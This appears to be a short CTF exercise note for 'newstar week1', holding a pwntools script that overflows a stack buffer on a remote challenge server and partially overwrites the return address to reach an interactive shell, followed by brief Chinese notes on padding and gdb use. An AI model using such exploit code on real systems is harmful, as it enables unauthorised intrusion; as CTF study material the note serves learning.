newstar week1 p1eee
from pwn import *
#p = process('./111')
p = remote('node4.buuoj.cn',28968)
elf = ELF('./111')
payload =b'A'*(0X20 +8) +p16(0x126c)
p.sendline(payload)
p.interactive()
recv 接受buf栈的地址
ljust(,)左对齐,0x88 用\x00补
查找字符串地址↑
gdb 查↓
n步过
64
32